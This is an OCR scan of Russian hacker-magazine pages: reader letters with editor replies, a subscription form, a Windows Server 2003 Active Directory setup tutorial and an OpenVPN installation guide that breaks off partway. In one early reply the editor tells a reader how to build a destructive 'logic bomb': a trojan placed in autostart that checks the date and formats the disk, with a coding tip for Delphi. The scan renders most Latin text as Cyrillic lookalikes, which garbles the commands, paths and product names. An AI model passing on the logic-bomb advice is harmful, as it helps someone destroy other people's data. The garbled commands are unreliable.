по себе где-нибудь примерно через недельку-две! Думаешь, это 
возможно? Если ты сможешь что-нибудь сделать, то отправь мне на 
мыльце! 

Очень прошу, позарез нужно! 

ВАУ-ВАУ!!! 

Привет, Никита, хитрая штучка! 

В те времена, когда интернета еще особенно не было, воровать пароли 
отдиалапа было невозможно, ввиду его крайней редкости, а е-кошелеч- 
ков даже и не предвиделось, люди тоже хотели как-то развлекаться. А 
поскольку и голых дам на компьютерахтогда былотоже нетак много (не 
считая, конечно, разных игр эротического характера), люди выкручива- 
лись как могли. Одним из наиболее деструктивных способов порадовать 
себя несчастьем ближнего были так называемые «логические бомбы». 
За этим хитрым названием прятались обычные трояны, которые висели 
в автозагрузке (либо добавляли себя в аиіоехес.Ьаі, либо считывали из 
этого файла программы и приписывались к ним по вирусному принципу 

— себя в конецфайла и ітр пеагв начало) и каждый раз проверяли сис- 
темную дату. Как только она совпадала с заданной, они форматировали 
диск, выдавали оскорбительные сообщения и т.д. 

Ты получил ответ на свой вопрос? Как вписаться в автозагрузку, ты 
узнаешь из моей статьи, которую я пиарил в одном из предыдущих 
ответов, а как получить текущую дату — изѵѵіп32.Ыр. Кстати, будешь 
кодить на ОеІрЫ, не сравнивай напрямую переменные ТОаіеТіте 

— они содержат секунды и миллисекунды и никогда не совпадут. 
Выдирай из них только то, что точно нужно, — число, дату и т.д. 
ЕВАУ-ЕВАУ! 



Маргарита Долгих (гікіІоз@таіІ.ги) 

Разговор 

Добрый день, коллеги. Будьте любезны ответить, где и как 
я могу оформить подписку на ваш журнал. Мы очень хотим 
порадовать таким подарком своего сослуживца — вашего 
большого поклонника. Но на сайте о подписке ни слова не 
нашли, а все ваши телефоны упорно молчат. 303! Ответьте 
уже, плиз. 

С уважением, Маргарита Долгих 

Добрый день, коллега! Я думаю, что Вы работаете не в журнале, кото- 
рый пишет про тяжелые будни российских саперов. Настоящий вни- 
мательный сапер (косынка, солитер, червы — нужное подчеркнуть) 
пошел бы на наш сайт, ввел бы в строку поиска слово «подписка» и 
просто вынужден был бы кликнуть по первой попавшейся ссылке. 

А ведь ссылка -то эта ведет отнюдь невСибирь к декабристам и их 
несчастным женам! Она гласит, что по всем вопросам по подпис- 
ке надо либо звонить, либо писать на 5иЬ5СгіЬе_хайдатеІапб.гщ 
либо идти на ѵѵѵѵѵѵ.діс.ги/розі/і 301 6/сЫаиІЕазр и онлайн заказы- 
вать редакционную подписку там. Это намного круче, чем покупать 
журнал у жадных барыг! А куда Вы звонили? Если на мой мобильный, 
то я почти всегда отвечаю. Мне туда звонят до сих пор и бросают 
трубку, а потом пишут зтз: «Гы чу ваг п ри вед респегт дай аську фор ба 
нифпадляг». 

Антон (Іодддіпд@таіІ.ги) 

А какже старый добрый ІРС? 

Привет, РЕДАКЦИЯ! Вам пишет ваш давний читатель. 

Сразу перейду к делу. Почему никого (почти никого) из редакции нету 
на канале #хакер.ш в старой доброй сети □АиМеСш? И еще удиви- 
тельно, как это из нескольких тысяч читателей на канале обита- 
ет только 46... Неужто не интересно пообщаться с единомышленника- 
ми? Или так тяжело зайти на сайт тігс.сот (или же открыть БУБ), 
установить этот клиент, написать пару заветных строк «/зегѵег ігс. 
сіаіпеі.ги», а потом «/піск І\І1скп4плЗ»? Надеюсь, данная ситуа- 
ция исправится в скором времени ;). 

С уважением, адепт «ХОЗЕ», мр_Торокано 

Привет! Личноя понятия не имею, почему никого из редакции там нет. Навер- 
ное, неохота :), да и, строго говоря, нетакой уж это официальный канал. Скорее, 
один из полуофициальных. Я там иногда торчу. Зато все появляются на форуме! 
Кстати, абсолютно согласен, если на канал прямо сейчас ринутсятысячи 
единомышленников и начнут срочно обсуждать наболевшее, будет очень 
жарко ;). Сейчас, я смотрю, уже 49 человек. □С 
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ПО ВСЕМ ВОПРОСАМ р связанным с подпиской, звоните по 
бесплатным телефонам 8(495)780-88-29 (для москвичей) и 8(800)200-3-999 (для 
жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 
Вопросы о подписке можно также направлять по адресу НоѲдІс.ги или прояс- 
нить на сайте ѵ\лллл/.ОІ_С.ги 



\ 

Теперь ты можешь получать 
журнал с КУРЬЕРОМ 

не только в Москве, но и в Санкт-Петербурге, Уфе, 
Нижнем Новгороде, Ростове-на-Дону, Волгограде, 
Самаре, Казани, Перми, Екатеринбурге, 

Челябинске, Омске, Новосибирске. 

Подробности в рубрике МЕѲАЫЕѴѴЗ. 

) 



КАК ОФОРМИТЬ ЗАКАЗ 

1 . Разборчиво заполните подписной купон и квитанцию, вырезав 

• их из журнала, сделав ксерокопию или распечатав с сайта 
ѵѵѵѵѵѵ.діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 

• квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 1 19992, Москва, 

ул. Тимура Фрунзе, д. 1 1 , стр. 44-45, ООО «Гейм Лэнд», отдел подписки. 



ВНИМАНИЕ! 

Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в редакцию по факсу 
или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по почтовому адресу 
редакции. 

Рекомендуем использовать факс или электронную почту, в последнем случае предвари- 
тельно отсканировав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один календарный месяц после опла- 
ты. Например, если вы производите оплату в ноябре, то журнал будете получать с января. 



СТОИМОСТЬ ЗАКАЗА НА КОМПЛЕКТ ХАКЕР+РѴР 



1 080 руб за 6 месяцев 1 980 руб за 1 2 месяцев 

5292 руб за комплект Хакер РУО + Спец СО + Железо РѴР 



і 



1 номер 
всего за 
147 рублей 



| на журнал Хакер ОѴБ 
I I комплект Хакер БѴР + Спец СО + 

І — 1 Железо ОѴО 

| | на 6 месяцев 

^|на 12 месяцев 

начиная с 2007 г. 

□ Доставлять журнал по почте 
на домашний адрес 
Доставлять журнал курьером: 

I I на адрес офиса * 

□ на домашний адрес** 

(Отметьте в квадрате выбранный вариант подписки) 

Ф.И.О. 



Дата рожд. пп. пп. па 



АДРЕС ДОСТАВКИ 

Индекс 

Область/ край 

Город 

Улица 

Дом Корпус 

Квартира/офис 

Телефон ( ) 

код 

Е-таіІ 

Сумма оплаты 

*в свободном поле укажи название фирмы и 
другую необходимую информацию 
**в свободном поле укажи другую необходимую 
информацию и альтернативный вариант доставки 
в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

АБ «ОРГРЭСБАНК», г. Москва 
р/с № 40702810509000132297 
к/с № 30101810900000000990 

БИК 044583990 КПП 770401001 

Плательщик 

Адрес (с индексом) 



Назначение платежа 




Сумма 


Оплата журнала « 
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Кассир 



Ф.И.О. 
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РПУЛЬТІТ *л*ррти* 
группу Н4ЛЫ«№ГТ№ІГН Н* 



Первый шаг 
навстречу 
Астіѵе Бікестокѵ 



Ркгріпьтвт ііімт 
тт ГруѴИІт рШрМн'ККИЯ 

ГН( т ШРШФЬйШ 



УСТАНОВКА КОНТРОЛЛЕРА ДОМЕНА В ѴѴШ00ѴѴ5 5ЕРѴЕР 2003 

Небольшие компании имеют тенденцию расти: сначала это небольшая комната с одним-двумя компью- 
терами, затем офис занимает уже целый этаж, здание, появляются удаленные филиалы. Увеличивается 
и количество компьютеров. Постепенно администрировать сеть организации становится все труднее и 
труднее. Ведь изначально все компьютеры входят в состав рабочих групп, где участки равны между собой. 
Выход один — перейти на доменную структуру, что позволит централизованно администрировать все 
ресурсы. Один из этапов здесь — установка и настройка контроллера домена. 



Установка контроллера домена 

Для упрощения будем считать, что уже имеется 
компьютер с установленной ѴѴіпсіоѵуз Зегѵег 
2003, который и будет выполнять роль конт- 
ролера домена (КД) . Системные требования 
зависят от количества пользователей. Так, для 
20-30 пользователей вполне подойдет про- 
стенький компьютер вроде Сеіегоп 633 с 256 
ОЗУ и жестким диском на 10 Гб. Хотя, учитывая 
важность КД (он хранит все данные каталога и 
управляет взаимодействием между пользовате- 
лями и доменом), весьма желательно наличие 
второго КД. 

Для работы Асгіѵе ОігесГогу понадобится нали- 
чие сервера ЭИЗ, поддерживающего протокол 
динамического обновления и ресурсные запи- 
си Зегѵісе Босайоп. Без него функции контрол- 
лера домена (вход в домен, репликация службы 
каталогов и т.д.) будут недоступны. Если такого 
сервера пока нет, его можно установить по ходу 



создания КД. Естественно, что для проведения 
всех операций понадобятся права локального 
администратора, который по окончании про- 
цесса станет уже администратором домена. 

Для установки контроллера домена необходи- 
мо воспользоваться мастером установки Асгіѵе 
ЭігесГогу («Пуск-> Выполнить -> бсргото») . В 
первых окнах мастера будет дана некоторая ин- 
формация и ссылка на справочные страницы. 
Так как это новый домен, то на странице «Тип 
контроллера домена» выбираем «Контроллер 
домена в новом домене». Второй вариант, 
«Добавочный контроллер домена в существу- 
ющем домене», следует выбирать, когда уже 
имеется один контроллер домена и планирует- 
ся добавить дополнительный контроллер для 
увеличения доступности и надежности сетевых 
служб. В следующем окне «Создать новый до- 
мен», в зависимости от ситуации, необходимо 
остановиться на одном из трех вариантов: 



• «Новый домен в новом лесу» — при создании 
первого (родительского) или независимого 
домена; 

• «Новый дочерний домен в существующем 
доменном дереве» — если требуется создать 
новый дочерний домен для уже существующего 
домена; 

• «Новое доменное дерево в существующем лесу» 
— для создания нового доменного дерева, кото- 
рое не будет дочерним куже существующим. 

Так как ничего пока нет, выбираем первый 
пункт и идем дальше. На странице «Новое имя 
домена» необходимо ввести полное (Б(^Э]\[) 
ЭИЗ-имя для создаваемого нового домена 
леса Асгіѵе Эігесіюгу (например, ехатріе. 
сот) . При этом не рекомендуется применять 
одиночное имя вроде ехатріе. На следующей 
странице проверяем ИеШІОЗ-имя, которое 
будет использовано для идентификации 
нового домена пользователями предыдущих 
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версий ѴѴіпс1о\ѵ$. Оно по возможности должно 
совпадать с первой меткой ЭИЗ-имени доме- 
на, что и будет установлено по умолчанию. 
Чтобы не перестраивать все такие системы, 
можно оставить старое название, применяв- 
шееся до перехода на Асгіѵе Эігесіюгу. 
Переходим на страницу «Папки базы данных 
и журналов», здесь необходимо ввести путь к 
каталогу, в котором располагаются папки базы 
данных и журналов. Для лучшей произво- 
дительности рекомендуется журнал и базу 
данных размещать на разных дисках. 
Аналогично поступаем в окне «Общий доступ к 
системному тому», указывая раздел, в который 
следует установить папку ЗУЗѴОЬ. Этот раздел 
обязательно должен быть отформатирован 
под файловую систему ШТЗ 5.0. Здесь будут 
находиться файлы, реплицируемые между 
контроллерами домена в домене или лесе. 

На следующем шаге «Диагностика регистрации 
ЭИ$» проверяется работа ЭИЗ-сервера. Если 
таковой обнаружить не удается, то админист- 
ратору предлагается: 

• решить проблему и повторить диагностичес- 
кий тест; 

•установить и настроить ЭИЗ-сервер на 
локальном компьютере, тогда сервер будет 
выбран в качестве предпочитаемого; другие 
компьютеры также могут использовать этот 
ЭИЗ-сервер; 

• пропустить шаг и решить проблему позже. 
Если ЭИЗ-сервера еще нет, выбираем второй 
вариант и переходим к странице «Разреше- 
ния», на которой определяются разреше- 
ния, устанавливаемые по умолчанию для 
объектов, являющихся пользователями или 
группами. Эти параметры влияют на сов- 
местимость приложений с компьютерами, 
которые работают под управлением опера- 
ционных систем, предшествующих ѴѴіпсіолѵз 
2000. Возможны два варианта совместимос- 
ти приложений с операционными система- 
ми. Мы остановимся на ѴѴіпсіоаѵз 2000/2003. 
На странице «Пароль администратора для 
режима восстановления» вводим пароль, 
который понадобится для восстановле- 



ния резервной копии состояния системы 
контроллера домена в режиме восстановле- 
ния Асгіѵе ЭігесШгу. И наконец, в «Сводке» 
проверяем сведения по установке, после 
чего последует сам процесс установки Асгіѵе 
Эігесіюгу и создание контроллера домена, а 
также инсталляция ЭИЗ-сервера, если эта 
процедура была разрешена. По окончании 
потребуется перезагрузка, чтобы изменения 
вступили в силу. 

Создание пользователей в глобальном 
каталоге Асгіѵе Оігесіогу 

Контроллер домена создан, и после перезагруз- 
ки уже потребуется не только ввести имя поль- 
зователя и пароль, но и выбрать домен, доступ к 
которому планируется осуществить. 

Для дальнейшей работы необходимо создать 
пользователей, это придется делать вруч- 
ную. Если пользователей не много, то можно 
ограничиться стандартной группой ІІзегз, 
в большинстве же случаев для упрощения 
дальнейшей работы лучше сразу их система- 
тизировать. Для этих целей будем использо- 
вать возможность создания подгрупп домена 
— организационных подразделений (ОП), 
представляющих собой логические контей- 
неры, размещающие учетные записи, общие 
ресурсы и другие ОП. 

Для администрирования Асгіѵе ЭігесЮгу в 
ѴѴіпсіоаѵз 2003 имеется несколько оснасток ттс: 

* «Асгіѵе ЭігесШгу — пользователи и компьюте- 
ры» — для создания и управления пользовате- 
лями, группами, организационными подразде- 
лениями и другими объектами Асіііѵе ЭігесЮгу; 

* «Асіііѵе Эігесііогу — домены и доверие» — для 
работы с доменами, деревьями и лесами доме- 
нов, установки доверительных отношений; 

* «Асіііѵе Эігесііогу — сайты и службы» — для 
управления сайтами, службами и подсетями, 
репликацией; 

* «Политика безопасности домена» и «Полити- 
ка безопасности контроллера домена» — для 
просмотра и изменения политик безопасности 
домена и контроллера домена, прав пользова- 
телей и аудита. 



Они доступны в «Панели управления -> Адми- 
нистрирование». Альтернативный вариант 
— после вызова ттс выбрать «Еііе -> АсШ/ 
Кетоѵе Зпар-Іп», нажать кнопку «Добавить» и 
указать необходимую оснастку из списка. Пос- 
ледний способ удобнее тем, что все инструмен- 
ты всегда будут под рукой. 

Итак, вызываем «Асгіѵе Эігесіюгу — пользо- 
ватели и компьютеры», по умолчанию будет 
произведено подключение к домену, к кото- 
рому относится компьютер. Для подключения 
к другому домену, например, если есть подоз- 
рение, что репликация еще не произведена и 
поэтому информация об объектах неправиль- 
на, щелкаем по заголовку «Асіііѵе Эігесіюгу 
— пользователи и компьютеры», нажимаем 
«Подключение к контроллеру домена»; до- 
ступные КД будут выведены в списке. 
Подключившись к нужному КД, первым 
делом создадим новое ОП, для чего нажимаем 
правой кнопкой мыши на название домена, 
выбираем «Ие\ѵ/Создать -> Подразделение 
(Ог^атзагіопШіі:)» и вводим название орга- 
низационного подразделения. Аналогичным 
путем в сделанном контейнере можно создать 
произвольное количество вложенных ОП. Для 
подключения к ресурсам домена локальная 
учетная запись не подойдет, необходима 
доменная учетная запись. Для ее создания в 
этом же меню выбираем «Пользователь». В 
появившемся окне «Новый объект -> Пользо- 
ватель» вводим имя и фамилию пользователя, 
а также имя для входа в домен (сам домен 
указывается, если их несколько) . Нажимаем 
«Далее» и переходим к следующей страни- 
це, где вбиваем пароль пользователя. Здесь 
же можно установить некоторые флаги для 
управления этой учетной записью: 

• «Требовать смены пароля при следующем 
входе в систему» — установлено по умолча- 
нию, необходимо для того, чтобы пароль знал 
только пользователь; при первом входе от него 
обязательно потребуют сменить пароль, иначе 
в систему он не попадет; 

• «Запретить смену пароля пользователя» 

— этот флажок полезен в том случае, если 
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одной зачетной записью пользуются несколько 
пользователей, чтобы случайное или умышлен- 
ное изменение пароля не блокировало доступ 
остальным; 

• «Срок действия пароля неограничен» — лю- 
бой пароль следует периодически менять, 

а этот флаг стоит использовать в случае, 
указанном выше, а также в сетях, не требующих 
серьезной защиты; 

• «Отключить учетную запись» — может приго- 
диться, если пользователь пока не собирается 
или не должен входить в сеть. 

Пароль должен удовлетворять требованиям 
политик. Чтобы их просмотреть, вызыва- 
ем редактор групповых политик, набрав 
«^ребп.тБС», затем переходим в «Конфи- 
гурация компьютера -> Конфигурация 
ѴѴіпсІоѵѵз Параметры безопасности 
Политики учетных записей -> Политика 
паролей». В домене и контроллере домена по- 
литика паролей устанавливается в «Политике 
безопасности домена» и «Политике безопас- 
ности контроллера домена» («Параметры 
безопасности -> Политики учетных записей 
-> Политика паролей») . Здесь же настраива- 
ются политики блокировки учетной записи и 
КегЪегоз. Учти, что политики доменов, сайтов, 
подразделений имеют более высокий приори- 
тет, чем локальные. 

После нажатия на «Далее» будет выведена 
результирующая информация. На этом созда- 
ние учетной записи пользователя закончено. 
Новый пользователь появится во вкладке 
справа. Если необходимо создать несколько 
учетных записей с одинаковыми свойствами, 
проще сделать одну, а остальные копировать. 
Для этого в меню, вызываемом щелчком по 
имени пользователя, выбираем «Копировать»; 
откроется мастер «Копировать объект — поль- 
зователь». 



Редактирование свойств учетной записи 

Посмотрим свойства созданной учетной запи- 
си. Двойным щелчком мыши вызываем окно 
свойств пользователя. В 13 вкладках можно 
установить все параметры, относящиеся к 
характеру деятельности этого пользователя 
и его контактной информации. Например, 
вкладка «Учетная запись» похожа на первый 
шаг мастера создания пользователя, за исклю- 
чением нескольких новых функций. Нажав 
на кнопку «Время входа», можно указать дни 
недели и время, когда пользователю разреше- 
но входить в сеть. Кнопка «Вход на» позволит 
определить компьютеры, на которые можно 
входить пользователю. Обрати внимание на 
флажок «Хранить пароль, используя обратимое 
шифрование» — его активация отключает 
шифрование хэшированием, что отрицательно 
сказывается на безопасности. Поле «Срок дейс- 
твия учетной записи» позволяет задать дату 
окончания действия учетной записи — весьма 
полезная возможность при предоставлении 
временного доступа. 

Группы, в которые входит пользователь, уста- 
навливаются во вкладке «Член групп». Выбира- 
ем «Добавить -> Дополнительно» и нажимаем 
«Поиск». В появившемся списке выбираем 
группу или группы, в которые должен входить 
пользователь, и жмем «ОК». В следующем окне 
проверяем имена, соглашаемся с выбором и 
давим «Применить». Таким же способом можно 
найти и остальные объекты: пользователей, 
компьютеры, опубликованные ресурсы. 

Если требуется одновременно установить 
одинаковые параметры для нескольких пользо- 
вателей, чтобы не прибегать к использованию 
скриптов, можно выделить пользователей, а 
затем выбрать их свойства. Причем некоторые 
операции можно произвести из контекстного 
меню, вызываемого щелчком мыши по имени 




> Проверка настройки 0М5-сервера 

пользователя. Поддерживается Пга^&Пгор, по- 
этому при передаче пользователя или компью- 
тера в другое ОП их можно просто перетащить в 
нужную папку. 

Подключение компьютеров 

Компьютеры, работающие под управлением 
ѴѴіпсіоѵѵб 2000/ХР, при подключении к серверу 
будут добавляться автоматически в группу 
СотрЩегБ. Для этого на каждом клиенте нужно 
выбрать «Мой Компьютер Свойства Имя 
компьютера», затем либо вызвать мастера 
сетевой идентификации, нажав кнопку «Иден- 
тификация», либо сразу ввести необходимые 
параметры, нажав кнопку «Изменить». Если 
есть системы, работающие под ѴѴіпсіоѵѵб 98, они 
подключаются как клиенты Асгіѵе ПігесПэгу; в 
этом случае учетные записи компьютера не со- 
здаются. Для их работы необходимо установить 
программу сІБСІіеЩ.ехе, которая имеется на 
установочном диске Ѵ\Йп2кЗ. 

Однако здесь есть один нюанс. Право добавлять 
компьютеры автоматически предоставляется 
всем зарегистрированным в домене пользова- 
телям, но количество автоматических регист- 
раций под одной учетной записью ограничено. 
Поэтому учетные записи некоторых компью- 
теров, возможно, придется добавлять вручную. 
Для этого достаточно щелкнуть правой 
кнопкой на контейнере, в который необходи- 
мо поместить запись, затем выбрать «Иеѵѵ -> 
Компьютер» и в появившемся окне ввести имя 
компьютера. 

По умолчанию присоединять компьютер к 
домену имеют право только члены группы 
«Администраторы домена». Чтобы разре- 
шить это действие другим пользователям 
или группам, необходимо нажать кнопку 
«Изменить» и выбрать их из списка, как это 
показано ранее. 
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>Установка времени входа для пользователя 



> Выбор типа контроллера домена 



Действия над группами 

Группы — более крупное понятие в иерар- 
хии объектов Асгіѵе Эігесіюгу, они содержат 
пользователей и компьютеры. Главное удобс- 
тво здесь — возможность одновременного 
задания разрешений всем членам группы, а 
все установки, действительные для группы, 
распространяются на все объекты, входящие 
в ее состав. После установки контроллера до- 
мена, в списке объектов появится несколько 
групп, предназначенных для самых разно- 
образных задач, таких как создание учетных 
записей, публикация ресурсов, управление 
ПИ5. Есть и группа «Гости домена», обладаю- 
щая минимальными правами. Скорее всего, 
этих групп не будет хватать, поэтому при- 
дется создавать группы под специфические 
задачи: по подразделениям (бухгалтерия, 
отдел продаж, склад), по должностным ли- 
цам (руководители, обычные пользователи, 
специалисты по безопасности, администра- 
торы), по приложениям. 

Создаются группы также из контекстного 
меню «Создать (Келѵ)-> Группа (Сгоир)». В 
появившемся окне «Новый объект -> Группа» 
задается имя, тип и область действия группы. 
Возможен выбор одного из трех типов. Груп- 
пы распространения (гіізіхіЪигіоп §гоирз) 
применяются в том случае, когда необходимо 
объединить несколько пользователей в спи- 
сок рассылки электронной почты. А группам 
безопасности (зесигйу^гоирз), кроме того, 
можно назначать доступ к ресурсам. Есть 
еще локальная группа, которая используется 
только на локальном компьютере, но она нас 
сейчас не интересует. Область действия груп- 
пы определяет, каким образом входящим в 
нее объектам назначаются разрешения для 
доступа. Здесь можно указать один из следу- 
ющих вариантов: 

• «Локальная в домене» — для установки разре- 
шений на доступ к ресурсам домена, в котором 



они определены, например, для управления 
доступа к общим папкам, принтерам; 

• «Глобальная» — применяется для предостав- 
ления доступа в любом дереве или лесе домена, 
подходит при организации совместной работы 
служащих нескольких подразделений; в группу 
этого типа входят только учетные записи доме- 
на, в котором они определены; 

• «Универсальная» — применяется для 3 трав- 
ления разрешениями во всех деревьях и лесах 
домена; сюда включаются учетные записи 
или группы из любого дерева или леса домена; 
любое изменение здесь необходимо реплици- 
ровать во все глобальные каталоги, поэтому 
сюда рекомендуется включать группы, а не 
пользователей. 

Для большинства случаев достаточно группы 
с областью действия «Локальная в домене». 
Аналогично пользователям и другим объектам, 
группы имеют свойства, доступ к которым 
можно получить из контекстного меню. 

Общий доступ к папкам 

Просмотреть доступные общие ресурсы, как 
локальные, так и удаленные, можно в консоли 
«Управление компьютером» (запускается из 
папки «Администрирование»). Исходно в «Об- 
щие папки -> Общие ресурсы» будут показаны 
ресурсы локальной системы. Для просмотра 
ресурсов на удаленной системе к ней сначала 
следует подключиться, вызвав пункт меню 
«Подключиться к другому компьютеру» и вы- 
брав его из списка. При этом для доступа будут 
использованы стандартные права. Общий 
доступ для локальных папок может быть пре- 
доставлен обычным способом из проводника: 
выбираем «Свойства -> Доступ», устанавлива- 
ем переключатель в «Открыть общий доступ 
для этой папки» и во вкладке «Безопасность» 
указываем разрешения. 

Теперь созданный ресурс требуется опубли- 
ковать в Асгіѵе ЭігесШгу. Это можно сделать в 



«Управление компьютером», выбрав в «Общие 
ресурсы» созданную общую папку и устано- 
вив в окне «Свойства -> Публикация» флажок 
«Опубликовать этот общий ресурс в Асгіѵе 
Эігесіюгу». После этого во вкладках «Разре- 
шения для общего доступа» и «Безопасность» 
необходимо уточнить разрешения. 

Вот, собственно, и все. Мы установили и 
настроили контроллер домена, создали поль- 
зователей и группы, научились публиковать 
общие ресурсы. ПС 



ПРЕИМУЩЕСТВА Ай ПЕРЕД 
ОДНОРАНГОВОЙ СЕТЬЮ 

Несмотря на то что планирование, уста- 
новка, настройка контроллера домена и 
поддержание АЭ в рабочем состоянии 
потребуют допол н ител ьн ых затрат, в том 
числе и временных; администратор и поль- 
зователи получат при этом несомненные 
преимущества. В первую очередь, повысит- 
ся управляемость сети, особенно это будет 
заметно в сетях со сложной топологией. 
Администратору не нужно будет бегать по 
этажам, чтобы разобраться с проблемами 
доступа кобщим ресурсам. Плюс интегра- 
ция с множеством продуктов, втом числе и 
с ІІпіх-системами. Все настройки произво- 
дятся в одном месте, чтоупрощаетзадачу 
и уменьшает вероятность конфликтов. 
Снижаются затраты при расширении сети. 
Повышается безопасность — теперь каждый 
получитто, что ему действительно нужно для 
работы, а не хочется. При этом пароль будет 
введен только один раз при регистрации, 
что скажется еще и на удобстве использова- 
ния. Администратор получает возможность 
централизованно управлять политикой 
паролей и другими функциями, позволяю- 
щими повысить защищенность сети. 
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СЕРГЕИ «еВІЫСЕВ» ЯРЕМЧУК 

/ СПШОЕП@1ІА.ГМ / 
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повышенной 

ЗАЩИЩЕННОСТИ 




X 






Мападетепі 
Сепіге БоНѵѵаге 



ѴРЫ баіеѵѵау 




ОРЕЫѴРМ: КРОССПЛАТФОРМЕННЫЙ ИНСТРУМЕНТ ДЛЯ СОЗДАНИЯ ВИРТУАЛЬНЫХ СЕТЕЙ 

Сегодня нечасто встретишь ситуацию, когда все подразделения компании находятся в пределах одного 
здания. Поэтому рано или поздно перед системным администратором встает задача обеспечить удобный 
и безопасный доступ к внутренним ресурсам, а значит, объединить территориально разнесенные сети с 
помощью надежного и защищенного канала, гарантирующего защиту от прослушивания и вмешательс- 
тва извне. В этой ситуации на помощь приходят виртуальные частные сети. 



ПроектОрепѴРЫ 

В настоящее время существует множество 
различных способов, позволяющих создавать 
виртуальные частные сети (ВЧС, по-английски 
— ѴігШаІ РгіѵаГе №шгогк, ѴР1Ч) . Остановим 
свой выбор на ОрепѴРИ (орепѵрп.пеі:) . Это 
полнофункциональное решение, созданное на 
основе 55Ь и дающее возможность довольно 
просто справляться со всем спектром задач 
по подключению удаленных пользователей 
или сетей с четко разграниченными правами 
доступами, поддержкой беспроводных сетей и 
балансировкой нагрузки. Имеются реализации 
для всех популярных сегодня операционных 
систем: Ілпих, *В50, Зоіагіз, Мае 05 X, ѴѴіпбоѵѵз 
от 2000. Поддерживаются: адаптивная компрес- 
сия потока, работа через МАТ, использование 
всех доступных в ЗЗЬ алгоритмов шифрования, 
аутентификаций и сертификатов. Клиенты 



могут иметь как статические, так и динамичес- 
кие ІР-адреса, что весьма полезно при біаі-ир 
соединениях или перемещении пользователя. 
ОрепУРИ может работать в сЬгооГокружении. В 
целях безопасности демон после запуска пони- 
жает права до минимально необходимых. 
ОрепУРИ является обычным пользователь- 
ским приложением, использующим драйверы 
ШпДар. Тип применяется при туннелирова- 
нии ІР-пакетов, а шр (он же еШегиар) — при 
туннелировании фреймов ЕбэегпеС В терми- 
нологии ОрепѴРИ такие туннели называются 
соответственно гоишб и Ъгіб^еб. Драйвер 
ТІШ/ТАР позволяет пользовательским 
программам самостоятельно обрабатывать 
соответствующие пакеты. ОрепѴРИ оптимизи- 
рован для работы с протоколом ЕГОР, который 
используется по умолчанию, но можно задейс- 
твовать и ТСР. 



Установка ОрепѴРЫ 

ОрепУРК находится в репозитариях практичес- 
ки всех дистрибутивов. Поэтому в большинс- 
тве случаев достаточно ввести что-то вроде 
«зибо арт-^ет іпзшіі орепѵрп» или «ушп іпзиаіі 
орепѵрп». Впрочем, сборка из исходных текстов 
также несложна. Если ядро собиралось само- 
стоятельно, следует убедиться, что в системе 
присутствуют устройства ШпДар : 

$ зибо тобргоЪе Сип 
$ Ізтоб I дгер Сип 
$ 1 б /беѵ/пеС/Сип 

Если ответ ничего не содержит, следует пере- 
собрать ядро, активировав следующие пункты: 

Беѵісе Бгіѵегз > 

ЫеСчлгогк беѵісе зиррогС > 
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>3апусктеста 



>Создание нового ѴРІЧ-сервера с помощью модуля ѴѴеЬтіп 



[*Шекшэгк сіеѵісе зиррогк 
<М> Шіѵегзаі ТШ/ТАР сіеѵісе 
сігіѵег зиррогк 

Теперь скачиваем последнюю версию ОрепѴРИ 
с сайта проекта и набираем: 

$ Саг -хгѵі орепѵрп-2 . О . 9 . каг . дг 
$ ссі орепѵрп-2 .0.9 

Когда в системе есть все необходимое, для 
установки хватает и стандартных «./сопіі^иге; 
таке; зисіо таке іпзіаіі». Проблемы обычно 
возникают в случае отсутствия библиотек ко 
или ззі. После установки работу компонентов 
можно протестировать, введя «таке сЬеск». 
Если сообщение о том, что «аіі 2 іезі: раззесі», 
покажется мало информативным, следует 
провести два доступных теста вручную. Сис- 
тема, построенная на основе ОрепѴРИ, может 
использовать два вида ключевой информации 
и, соответственно, два алгоритма шифрова- 
ния: симметричное со статическим ключом и 
асимметричное с использованием ТЬЗ/ЗЗЬ- 
сертификатов и ключей. Посмотреть, какие 
алгоритмы шифрования доступны, можно с 
помощью команды: 

$ зи сіо орепѵрп --зккж-сірііегз 

Проверим работу ОрепѴРИ со статическим 
ключом: 

$ зисіо орепѵрп --депкеу --зесгек 
/екс/орепѵрп/зкакіс . кеу 

И теперь тестируем: 

$ зисіо орепѵрп --кезк-сгурко -- 
зесгек /екс/орепѵрп/зкакіс . кеу 

Результатом должно быть сообщение о том, что 
«ОрепѴРИ сгуріо зек-СезСтобе ЗИССЕЕЭЕЭ». 
Для проверки работы с асимметричными 
ключами следует воспользоваться готовыми 
конфигурационными файлами, которые нахо- 
дятся в подкаталоге затрІе-сопй^-Шез архива. 



В разных консолях выполняем следующие 
команды: 

$ зисіо орепѵрп затріе-сопкід- 
кіІез/ІоорЬаск-зегѵег 
$ зисіо орепѵрп затріе-сопкід- 
кіІез/ІоорЬаск-сІіепк 

Если в ответ мы получаем «ѴЕКІЕѴ ОК» и про- 
исходит обмен зашифрованными пакетами, то 
можно смело идти дальше. 

Следующим шагом создадим учетную запись, 
под которой будет работать демон орепѵрп, 
понижая свои привилегии после запуска: 

$ зисіо изегасісі орепѵрп 

Очень не рекомендую использовать здесь 
поЪобу — если несколько серверов работают 
от имени этого пользователя, он становится не 
менее всемогущим, чем гоок 
Создаем каталог, в котором будут храниться 
настройки и ключи: 

$ зисіо гпксііг /екс/орепурп 

Если планируется работа нескольких демонов 
орепѵрп, удобнее создать подкаталог для 
каждого, чтобы затем не путаться в назначении 
конфигурационных файлов. 

Создание ключей сервера и клиентов 

Как генерировать статический ключ, показано 
выше («орепѵрп -§епкеу») . В этом случае на 
сервере и клиентах используется один ключ. Это 
удобно, но довольно рискованно. Если ключ по- 
падет к злоумышленнику, тот сможет расшифро- 
вывать всю информацию, передаваемую по сети. 
Сертификаты и ключи для сервера и клиентов 
необходимы при асимметричном шифрова- 
нии. Проще и удобнее создавать их не вручную, 
а с помощью скриптов, находящихся в подка- 
талоге еазу-гза (к слову, в подкаталоге ѴѴіпсіо\ѵ5 
имеются и Ъаі-файлы) . Их здесь несколько: 

• корневой сертификат (С А — СегіШсаіе 
